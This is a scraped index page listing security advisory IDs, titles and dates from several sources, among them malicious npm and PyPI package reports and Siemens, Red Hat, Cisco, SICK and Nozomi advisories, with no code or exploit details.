mal-2024-8914 Malicious code in artifact-lab-3-package-4c04b1a2 (PyPI) 2024-09-19T22:51:37Z 2024-09-19T22:51:37Z
mal-2024-8913 Malicious code in seconddjallal-ui-common (npm) 2024-09-19T21:46:37Z 2024-09-19T21:46:37Z
mal-2024-1382 Malicious code in cst-web-chat (npm) 2024-05-24T19:45:53Z 2024-09-19T18:38:11Z
mal-2024-8912 Malicious code in infosnap-secure-family-portal (npm) 2024-09-19T17:40:56Z 2024-09-19T17:40:56Z
mal-2024-8911 Malicious code in dc-testing (npm) 2024-09-19T09:30:47Z 2024-09-19T09:30:47Z
mal-2024-8921 Malicious code in shopify-app-session-storage-test-utils (npm) 2024-09-19T01:42:32Z 2024-09-19T01:42:38Z
mal-2024-8920 Malicious code in princedecmtest (npm) 2024-09-19T01:42:32Z 2024-09-19T01:42:37Z
mal-2024-8919 Malicious code in myotherpkg (npm) 2024-09-19T01:42:32Z 2024-09-19T01:42:32Z
mal-2024-8918 Malicious code in mfp-config-xml (npm) 2024-09-19T01:42:31Z 2024-09-19T01:42:32Z
mal-2024-8917 Malicious code in ibm-strings (npm) 2024-09-19T01:42:31Z 2024-09-19T01:42:32Z
mal-2024-8916 Malicious code in dmn-editor-envelope (npm) 2024-09-19T01:42:32Z 2024-09-19T01:42:32Z
mal-2024-8915 Malicious code in bamoe-standalone-bpmn-and-dmn-editors-classic (npm) 2024-09-19T01:42:32Z 2024-09-19T01:42:32Z
mal-2024-8885 Malicious code in stedi-integrations (npm) 2024-09-17T08:30:57Z 2024-09-19T00:31:19Z
mal-2024-8909 Malicious code in zama.js (npm) 2024-09-18T23:39:38Z 2024-09-18T23:39:45Z
mal-2024-8903 Malicious code in rnjnioep (npm) 2024-09-18T23:39:38Z 2024-09-18T23:39:45Z
mal-2024-8910 Malicious code in zama1.js (npm) 2024-09-18T23:39:38Z 2024-09-18T23:39:38Z
mal-2024-8908 Malicious code in ttuiooty (npm) 2024-09-18T23:39:38Z 2024-09-18T23:39:38Z
mal-2024-8907 Malicious code in trjhasd (npm) 2024-09-18T23:39:38Z 2024-09-18T23:39:38Z
mal-2024-8904 Malicious code in rokihfds (npm) 2024-09-18T23:39:38Z 2024-09-18T23:39:38Z
mal-2024-8902 Malicious code in kk4845.js (npm) 2024-09-18T23:39:38Z 2024-09-18T23:39:38Z
mal-2024-8901 Malicious code in evm-oracle (npm) 2024-09-18T23:34:52Z 2024-09-18T23:34:52Z
mal-2024-8906 Malicious code in temp928546 (npm) 2024-09-18T23:31:03Z 2024-09-18T23:31:04Z
mal-2024-8905 Malicious code in temp240824 (npm) 2024-09-18T23:31:03Z 2024-09-18T23:31:04Z
mal-2024-8900 Malicious code in bsc-stdlib-polyfill (npm) 2024-09-18T20:41:21Z 2024-09-18T20:41:21Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
wid-sec-w-2024-2190 Red Hat Single Sign On und Keycloak: Mehrere Schwachstellen ermöglicht Privilegieneskalation 2024-09-19T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2189 Microsoft Edge: Mehrere Schwachstellen 2024-09-19T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2188 FreeBSD Project FreeBSD OS: Schwachstelle ermöglicht Codeausführung 2024-09-19T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2187 Microsoft Visio 2016: Schwachstelle ermöglicht Codeausführung 2024-09-19T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2186 Red Hat Enterprise Linux: Mehrere Schwachstellen 2024-09-19T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2185 Keycloak: Schwachstelle ermöglicht Darstellen falscher Informationen 2024-09-19T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2179 Red Hat Enterprise Linux (libnbd): Schwachstelle ermöglicht Man-in-the-middle-Bedingung 2024-09-18T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2177 CoreDNS: Mehrere Schwachstellen 2024-09-18T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2174 Red Hat OpenShift: Mehrere Schwachstellen ermöglichen Codeausführung 2024-09-17T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2171 LibreOffice: Schwachstelle ermöglicht Manipulation von Dateien 2024-09-17T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2166 MELDUNG ZURÃœCKGEZOGEN 2024-09-17T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2163 Google Chrome: Schwachstelle ermöglicht nicht spezifizierten Angriff 2024-09-17T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2161 AngularJS: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen 2024-09-17T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2117 Intel Prozessor: Mehrere Schwachstellen 2024-09-10T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2056 FreeBSD Project FreeBSD OS: Mehrere Schwachstellen ermöglichen Privilegieneskalation und Codeausführung 2024-09-04T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2048 Yubico YubiKey: Schwachstelle ermöglicht Klonen von Signaturschlüsseln 2024-09-03T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2047 Python: Schwachstelle ermöglicht Denial of Service 2024-09-03T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2040 OpenSSL: Schwachstelle ermöglicht Denial of Service 2024-09-03T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-2038 Mozilla Firefox, Firefox ESR und Thunderbird: Mehrere Schwachstellen 2024-09-03T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-1942 Wireshark: Schwachstelle ermöglicht Denial of Service 2024-08-28T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-1922 Red Hat JBoss Enterprise Application Platform und Integration Camel K: Schwachstelle ermöglicht Offenlegung von Informationen 2024-08-25T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-1896 Ruby: Schwachstelle ermöglicht Denial of Service 2024-08-21T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-1889 Python: Schwachstelle ermöglicht Denial of Service 2024-08-20T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-1800 PostgreSQL: Schwachstelle ermöglicht Privilegieneskalation 2024-08-08T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-1744 Ruby REXML: Mehrere Schwachstellen ermöglichen Denial of Service 2024-07-31T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-1720 Ruby REXML: Schwachstelle ermöglicht Denial of Service 2024-07-28T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-1678 Apache CXF: Mehrere Schwachstellen 2024-07-18T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-1607 Linux Kernel: Mehrere Schwachstellen 2024-07-14T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-1568 Mozilla Firefox und Firefox ESR: Mehrere Schwachstellen 2024-07-09T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
wid-sec-w-2024-1509 QEMU: Schwachstelle ermöglicht Denial of Service und Offenlegung von Informationen 2024-07-02T22:00:00.000+00:00 2024-09-19T22:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
ssa-097435 SSA-097435: Usernames Disclosure Vulnerability in Mendix Runtime 2024-09-10T00:00:00Z 2024-09-12T00:00:00Z
ssa-999588 SSA-999588: Multiple Vulnerabilities in User Management Component (UMC) Before V2.11.2 2023-12-12T00:00:00Z 2024-09-10T00:00:00Z
ssa-969738 SSA-969738: Denial of Service Vulnerability in SIMATIC S7-200 SMART Devices 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-962515 SSA-962515: Out of Bounds Read Vulnerability in Industrial Products 2024-05-14T00:00:00Z 2024-09-10T00:00:00Z
ssa-955858 SSA-955858: Multiple Vulnerabilities in LOGO! 8 BM Devices 2022-10-11T00:00:00Z 2024-09-10T00:00:00Z
ssa-921449 SSA-921449: Plaintext Storage of a Password Vulnerability in LOGO! V8.3 BM Devices 2024-08-13T00:00:00Z 2024-09-10T00:00:00Z
ssa-883918 SSA-883918: Information Disclosure Vulnerability in SIMATIC WinCC 2024-07-09T00:00:00Z 2024-09-10T00:00:00Z
ssa-869574 SSA-869574: Multiple Vulnerabilities in SINEMA Remote Connect Server Before V3.2 SP2 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-844582 SSA-844582: Electromagnetic Fault Injection in LOGO! V8.3 BM Devices Results in Broken LOGO! V8.3 Product CA 2023-12-12T00:00:00Z 2024-09-10T00:00:00Z
ssa-832273 SSA-832273: Multiple Vulnerabilities in Fortigate NGFW Before V7.4.3 on RUGGEDCOM APE1808 Devices 2024-03-12T00:00:00Z 2024-09-10T00:00:00Z
ssa-792319 SSA-792319: Missing Read Out Protection in SENTRON 7KM PAC3x20 Devices 2024-03-12T00:00:00Z 2024-09-10T00:00:00Z
ssa-783481 SSA-783481: Denial-of-Service Vulnerability in LOGO! 8 BM 2021-03-09T00:00:00Z 2024-09-10T00:00:00Z
ssa-773256 SSA-773256: Impact of Socket.IO CVE-2024-38355 on Siemens Industrial Products 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-765405 SSA-765405: Multiple Vulnerabilities in SIMATIC RFID Readers 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-753746 SSA-753746: Denial of Service Vulnerabilities in SIMATIC WinCC Affecting Other SIMATIC Software Products 2024-02-13T00:00:00Z 2024-09-10T00:00:00Z
ssa-721642 SSA-721642: Injection Vulnerability in SCALANCE W700 802.11 AX Family Before V2.4 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-698820 SSA-698820: Multiple Vulnerabilities in Fortigate NGFW on RUGGEDCOM APE1808 Devices 2024-07-09T00:00:00Z 2024-09-10T00:00:00Z
ssa-691715 SSA-691715: Vulnerability in OPC Foundation Local Discovery Server Affecting Siemens Products 2023-04-11T00:00:00Z 2024-09-10T00:00:00Z
ssa-690517 SSA-690517: Multiple Vulnerabilities in SCALANCE W700 802.11 AX Family 2024-06-11T00:00:00Z 2024-09-10T00:00:00Z
ssa-673996 SSA-673996: Buffer Overflow Vulnerability in Third-Party Component in SICAM and SITIPE Products 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-629254 SSA-629254: Remote Code Execution Vulnerability in SIMATIC SCADA and PCS 7 systems 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-566905 SSA-566905: Multiple Denial of Service Vulnerabilities in the Webserver of Industrial Products 2023-04-11T00:00:00Z 2024-09-10T00:00:00Z
ssa-455250 SSA-455250: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices Before V11.1.2-h3 2024-04-09T00:00:00Z 2024-09-10T00:00:00Z
ssa-446545 SSA-446545: Impact of RegreSSHion (CVE-2024-6387) in Siemens Industrial Products 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-427715 SSA-427715: Stack-Based Buffer Overflow Vulnerability in Tecnomatix Plant Simulation 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-423808 SSA-423808: Multiple NULL Pointer Dereference Vulnerabilities in Industrial Products 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-417159 SSA-417159: Multiple Vulnerabilities in SINEMA Remote Connect Client Before V3.2 SP2 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-359713 SSA-359713: Authorization Bypass Vulnerability in Industrial Edge Management 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
ssa-349422 SSA-349422: Denial of Service Vulnerability in Industrial Real-Time (IRT) Devices 2019-10-08T00:00:00Z 2024-09-10T00:00:00Z
ssa-342438 SSA-342438: Privilege Escalation Vulnerability in SINUMERIK ONE, SINUMERIK 840D and SINUMERIK 828D 2024-09-10T00:00:00Z 2024-09-10T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
rhsa-2023_7741 Red Hat Security Advisory: Red Hat Ceph Storage 6.1 security, enhancements, and bug fix update 2023-12-12T13:55:37+00:00 2025-03-29T04:27:52+00:00
rhsa-2024_0306 Red Hat Security Advisory: OpenShift Container Platform 4.11.57 bug fix and security update 2024-01-24T20:54:46+00:00 2025-03-29T04:27:48+00:00
rhsa-2023_7831 Red Hat Security Advisory: OpenShift Container Platform 4.14.7 bug fix and security update 2024-01-03T20:04:32+00:00 2025-03-29T04:27:47+00:00
rhsa-2023_7602 Red Hat Security Advisory: OpenShift Container Platform 4.13.25 security and extras update 2023-12-06T00:16:04+00:00 2025-03-29T04:27:46+00:00
rhsa-2023_7710 Red Hat Security Advisory: Red Hat OpenShift for Windows Containers 7.2.0 security update 2023-12-11T00:20:04+00:00 2025-03-29T04:27:43+00:00
rhsa-2023_7599 Red Hat Security Advisory: OpenShift Container Platform 4.14.5 bug fix and security update 2023-12-05T09:57:03+00:00 2025-03-29T04:27:36+00:00
rhsa-2023_7704 Red Hat Security Advisory: OpenShift Virtualization 4.14.1 security and bug fix update 2023-12-07T15:00:28+00:00 2025-03-29T04:27:33+00:00
rhsa-2023_6842 Red Hat Security Advisory: OpenShift Container Platform 4.12.43 bug fix and security update 2023-11-16T20:31:52+00:00 2025-03-29T04:27:32+00:00
rhsa-2023_7198 Red Hat Security Advisory: OpenShift Container Platform 4.15.0 bug fix and security update 2024-02-27T20:49:10+00:00 2025-03-29T04:27:30+00:00
rhsa-2023_7470 Red Hat Security Advisory: OpenShift Container Platform 4.14.4 bug fix and security update 2023-11-29T11:36:57+00:00 2025-03-29T04:27:28+00:00
rhsa-2023_7479 Red Hat Security Advisory: OpenShift Container Platform 4.11.54 bug fix and security update 2023-11-29T01:40:41+00:00 2025-03-29T04:27:26+00:00
rhsa-2023_7703 Red Hat Security Advisory: Red Hat OpenShift Pipelines 1.10.6 release and security update 2023-12-07T14:57:07+00:00 2025-03-29T04:27:23+00:00
rhsa-2023_6841 Red Hat Security Advisory: Red Hat OpenShift Enterprise security update 2023-11-16T20:14:47+00:00 2025-03-29T04:27:21+00:00
rhsa-2023_7555 Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.3.0 security update 2023-11-28T18:50:01+00:00 2025-03-29T04:27:18+00:00
rhsa-2023_7469 Red Hat Security Advisory: OpenShift Container Platform 4.14.4 security and extras update 2023-11-29T10:27:24+00:00 2025-03-29T04:27:17+00:00
rhsa-2023_7699 Red Hat Security Advisory: Red Hat OpenShift Pipelines Client tkn for 1.10.6 release and security update 2023-12-07T14:26:32+00:00 2025-03-29T04:27:13+00:00
rhsa-2023_7201 Red Hat Security Advisory: OpenShift Container Platform 4.15.0 packages and security update 2024-02-27T22:34:13+00:00 2025-03-29T04:27:13+00:00
rhsa-2023_6839 Red Hat Security Advisory: OpenShift Container Platform 4.14.2 security update 2023-11-16T05:56:26+00:00 2025-03-29T04:27:12+00:00
rhsa-2023_7522 Red Hat Security Advisory: OpenShift Virtualization 4.13.6 security and bug fix update 2023-11-28T13:45:02+00:00 2025-03-29T04:27:08+00:00
rhsa-2023_7662 Red Hat Security Advisory: Red Hat OpenShift for Windows Containers 6.0.3 security update 2023-12-06T00:20:48+00:00 2025-03-29T04:27:04+00:00
rhsa-2023_7475 Red Hat Security Advisory: OpenShift Container Platform 4.13.24 bug fix and security update 2023-11-29T01:47:09+00:00 2025-03-29T04:27:04+00:00
rhsa-2023_7200 Red Hat Security Advisory: OpenShift Container Platform 4.15.z security update 2024-02-27T22:49:18+00:00 2025-03-29T04:27:01+00:00
rhsa-2023_6788 Red Hat Security Advisory: Red Hat OpenShift GitOps security update 2023-11-08T02:05:06+00:00 2025-03-29T04:27:01+00:00
rhsa-2023_6840 Red Hat Security Advisory: OpenShift Container Platform 4.14.2 packages and security update 2023-11-15T07:24:02+00:00 2025-03-29T04:27:00+00:00
rhsa-2023_6279 Red Hat Security Advisory: cert-manager Operator for Red Hat OpenShift 1.11.5 2023-11-15T01:08:30+00:00 2025-03-29T04:27:00+00:00
rhsa-2023_7521 Red Hat Security Advisory: OpenShift Virtualization 4.13.6 RPMs security and bug fix update 2023-11-28T13:17:06+00:00 2025-03-29T04:26:59+00:00
rhsa-2023_7478 Red Hat Security Advisory: OpenShift Container Platform 4.11.54 security and extras update 2023-11-29T00:44:58+00:00 2025-03-29T04:26:54+00:00
rhsa-2023_6787 Red Hat Security Advisory: Network Observability security update 2023-11-08T01:54:46+00:00 2025-03-29T04:26:53+00:00
rhsa-2023_6894 Red Hat Security Advisory: OpenShift Container Platform 4.12.44 bug fix and security update 2023-11-21T12:36:12+00:00 2025-03-29T04:26:51+00:00
rhsa-2023_6836 Red Hat Security Advisory: OpenShift Container Platform 4.14.2 security and extras update 2023-11-15T00:47:45+00:00 2025-03-29T04:26:50+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
cisco-sa-nso-auth-bypass-qnteesp Multiple Cisco Products Web-Based Management Interface Privilege Escalation Vulnerability 2024-09-11T16:00:00+00:00 2024-09-19T16:47:17+00:00
cisco-sa-nxos-cmd-injection-xd9ohyop Cisco NX-OS Software CLI Command Injection Vulnerability 2024-07-01T16:00:00+00:00 2024-09-17T18:05:20+00:00
cisco-sa-openssh-rce-2024 Remote Unauthenticated Code Execution Vulnerability in OpenSSH Server (regreSSHion): July 2024 2024-07-02T16:00:00+00:00 2024-09-13T14:43:44+00:00
cisco-sa-pak-mem-exhst-3ke9fefy Cisco IOS XR Software UDP Packet Memory Exhaustion Vulnerability 2024-09-11T16:00:00+00:00 2024-09-11T16:00:00+00:00
cisco-sa-l2services-2mvhdnuc Cisco IOS XR Software Network Convergence System Denial of Service Vulnerability 2024-09-11T16:00:00+00:00 2024-09-11T16:00:00+00:00
cisco-sa-isis-xehpbvne Cisco IOS XR Software Segment Routing for Intermediate System-to-Intermediate System Denial of Service Vulnerability 2024-09-11T16:00:00+00:00 2024-09-11T16:00:00+00:00
cisco-sa-iosxr-xml-tcpdos-zexvru2s Cisco IOS XR Software Dedicated XML Agent TCP Denial of Service Vulnerability 2024-09-11T16:00:00+00:00 2024-09-11T16:00:00+00:00
cisco-sa-iosxr-shellutil-hcb278wd Cisco IOS XR Software CLI Arbitrary File Read Vulnerability 2024-09-11T16:00:00+00:00 2024-09-11T16:00:00+00:00
cisco-sa-iosxr-priv-esc-crg5vhcq Cisco IOS XR Software CLI Privilege Escalation Vulnerability 2024-09-11T16:00:00+00:00 2024-09-11T16:00:00+00:00
cisco-sa-iosxr-ponctlr-ci-ohchmsfl Cisco Routed Passive Optical Network Controller Vulnerabilities 2024-09-11T16:00:00+00:00 2024-09-11T16:00:00+00:00
cisco-sa-ise-info-exp-vdf8jbyk Cisco Identity Services Engine Sensitive Information Disclosure Vulnerability 2024-08-21T16:00:00+00:00 2024-09-05T13:14:02+00:00
cisco-sa-meraki-agent-dll-hj-ptn7ptke Cisco Meraki Systems Manager Agent for Windows Privilege Escalation Vulnerability 2024-09-04T16:00:00+00:00 2024-09-04T16:00:00+00:00
cisco-sa-ise-injection-6kn9tsxm Cisco Identity Services Engine Command Injection Vulnerability 2024-09-04T16:00:00+00:00 2024-09-04T16:00:00+00:00
cisco-sa-expressway-auth-kdfrcz2j Cisco Expressway Edge Improper Authorization Vulnerability 2024-09-04T16:00:00+00:00 2024-09-04T16:00:00+00:00
cisco-sa-duo-epic-info-sdlv6h8y Cisco Duo Epic for Hyperdrive Information Disclosure Vulnerability 2024-09-04T16:00:00+00:00 2024-09-04T16:00:00+00:00
cisco-sa-cslu-7ghmzwmw Cisco Smart Licensing Utility Vulnerabilities 2024-09-04T16:00:00+00:00 2024-09-04T16:00:00+00:00
cisco-sa-radius-spoofing-july-2024-87ccdwz3 RADIUS Protocol Spoofing Vulnerability (Blast-RADIUS): July 2024 2024-07-10T16:00:00+00:00 2024-09-03T14:10:25+00:00
cisco-sa-multi-vuln-finesse-qp6gbuo2 Multiple Cisco Products OpenSocial Gadget Editor Vulnerabilities 2021-01-13T16:00:00+00:00 2024-09-03T13:04:54+00:00
cisco-sa-nxos-psbe-ce-yvbtn5du Cisco NX-OS Software Python Sandbox Escape Vulnerabilities 2024-08-28T16:00:00+00:00 2024-08-28T16:00:00+00:00
cisco-sa-nxos-dhcp6-relay-dos-zneaa6xn Cisco NX-OS Software DHCPv6 Relay Agent Denial of Service Vulnerability 2024-08-28T16:00:00+00:00 2024-08-28T16:00:00+00:00
cisco-sa-nxos-cmdinj-lq6jszhh Cisco NX-OS Software Command Injection Vulnerability 2024-08-28T16:00:00+00:00 2024-08-28T16:00:00+00:00
cisco-sa-nxos-bshacepe-bapehsx7 Cisco NX-OS Software Bash Arbitrary Code Execution and Privilege Escalation Vulnerabilities 2024-08-28T16:00:00+00:00 2024-08-28T16:00:00+00:00
cisco-sa-capic-priv-esc-uyqjjnuu Cisco Application Policy Infrastructure Controller Privilege Escalation Vulnerability 2024-08-28T16:00:00+00:00 2024-08-28T16:00:00+00:00
cisco-sa-apic-cousmo-ubpbygbq Cisco Application Policy Infrastructure Controller Unauthorized Policy Actions Vulnerability 2024-08-28T16:00:00+00:00 2024-08-28T16:00:00+00:00
cisco-sa-curl-libcurl-d9ds39cv cURL and libcurl Vulnerability Affecting Cisco Products: October 2023 2023-10-12T16:00:00+00:00 2024-08-27T18:06:16+00:00
cisco-sa-ise-rest-5bpkrntz Cisco Identity Services Engine REST API Blind SQL Injection Vulnerabilities 2024-08-21T16:00:00+00:00 2024-08-22T15:15:53+00:00
cisco-sa-ise-csrf-y4zuz5rj Cisco Identity Services Engine Cross-Site Request Forgery Vulnerability 2024-08-21T16:00:00+00:00 2024-08-21T16:00:00+00:00
cisco-sa-cucm-xss-9zmfhyz Cisco Unified Communications Manager Cross-Site Scripting Vulnerability 2024-08-21T16:00:00+00:00 2024-08-21T16:00:00+00:00
cisco-sa-cucm-dos-kkhq43we Cisco Unified Communications Manager Denial of Service Vulnerability 2024-08-21T16:00:00+00:00 2024-08-21T16:00:00+00:00
cisco-sa-wsa-bypass-vxvqwzsj Cisco Secure Web Appliance Content Encoding Filter Bypass Vulnerability 2023-08-02T16:00:00+00:00 2024-08-14T14:27:30+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
sca-2025-0006 Vulnerability affecting picoScan and multiScan 2025-04-28T13:00:00.000Z 2025-04-28T13:00:00.000Z
sca-2025-0005 Vulnerabilities in SICK Flexi Compact 2025-04-28T10:00:00.000Z 2025-04-28T10:00:00.000Z
sca-2024-0003 Critical vulnerability in multiple SICK products 2024-10-17T13:00:00.000Z 2024-10-17T13:00:00.000Z
sca-2024-0002 Vulnerability in SICK MSC800 2024-09-11T23:00:00.000Z 2024-09-11T23:00:00.000Z
sca-2024-0001 Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics 2024-01-29T00:00:00.000Z 2024-01-29T00:00:00.000Z
sca-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
sca-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
sca-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
sca-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
sca-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
sca-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
sca-2023-0005 Vulnerabilities in SICK EventCam App 2023-06-19T11:00:00.000Z 2023-06-19T11:00:00.000Z
sca-2023-0004 Vulnerabilities in SICK FTMg 2023-05-11T13:00:00.000Z 2023-05-11T13:00:00.000Z
sca-2023-0003 Vulnerability in SICK Flexi Soft and Flexi Classic Gateways 2023-05-03T13:00:00.000Z 2023-05-03T13:00:00.000Z
sca-2023-0002 Use of Telnet in multiple SICK Flexi Soft and Flexi Classic Gateways 2023-04-11T10:00:00.000Z 2023-04-11T10:00:00.000Z
sca-2023-0001 Bootloader mode vulnerability in Flexi Soft Gateways v3 2023-02-20T14:00:00.000Z 2023-02-20T14:00:00.000Z
sca-2022-0015 Use of a Broken or Risky Cryptographic Algorithm in SICK RFU6xx RADIO FREQUEN. SENSOR 2022-12-08T16:00:00.000Z 2022-12-08T16:00:00.000Z
sca-2022-0013 Password recovery vulnerability affects multiple SICK SIMs 2022-10-21T13:00:00.000Z 2022-11-04T14:00:00.000Z
sca-2022-0014 SICK FlexiCompact affected by Denial of Service vulnerability 2022-10-31T11:00:00.000Z 2022-10-31T11:00:00.000Z
sca-2022-0012 OpenSSL vulnerability affects multiple SICK SIMs 2022-08-08T13:00:00.000Z 2022-08-03T13:00:00.000Z
sca-2022-0010 Vulnerability in SICK Flexi Soft Designer & Safety Designer 2022-05-16T10:00:00.000Z 2022-07-19T10:00:00.000Z
sca-2022-0011 Vulnerabilities in SICK Package Analytics 2022-06-08T15:00:00.000Z 2022-06-08T15:00:00.000Z
sca-2022-0009 Vulnerability in SICK Flexi Soft PROFINET IO Gateway FX0-GPNT and SICK microScan3 PROFINET 2022-04-29T15:00:00.000Z 2022-04-29T15:00:00.000Z
sca-2022-0008 Vulnerability in SICK Gateways for Flexi Soft, Flexi Compact, SICK EFI Gateway UE4740, SICK microScan3 and outdoorScan3 2022-04-29T15:00:00.000Z 2022-04-29T15:00:00.000Z
sca-2022-0007 Vulnerabilities in SICK MARSIC300 2022-04-21T15:00:00.000Z 2022-04-21T15:00:00.000Z
sca-2022-0006 Vulnerability in SICK MSC800 2022-04-11T15:00:00.000Z 2022-04-11T15:00:00.000Z
sca-2022-0005 Vulnerability in SICK Overall Equipment Effectiveness (OEE) 2022-04-11T15:00:00.000Z 2022-04-11T15:00:00.000Z
sca-2022-0004 Microsoft vulnerability affects multiple SICK IPCs with SICK MEAC 2022-04-11T15:00:00.000Z 2022-03-31T15:00:00.000Z
sca-2022-0003 Vulnerabilities in SICK FTMg 2022-03-31T15:00:00.000Z 2022-03-31T15:00:00.000Z
sca-2022-0002 PwnKit vulnerability affects multiple SICK IPCs 2022-02-23T16:00:00.000Z 2022-02-23T16:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
nn-2024_2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024_1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2022_2-02 Authenticated RCE on project configuration import in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2022_2-01 Authenticated RCE on logo report upload in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2024-09-19T11:00:00.000Z
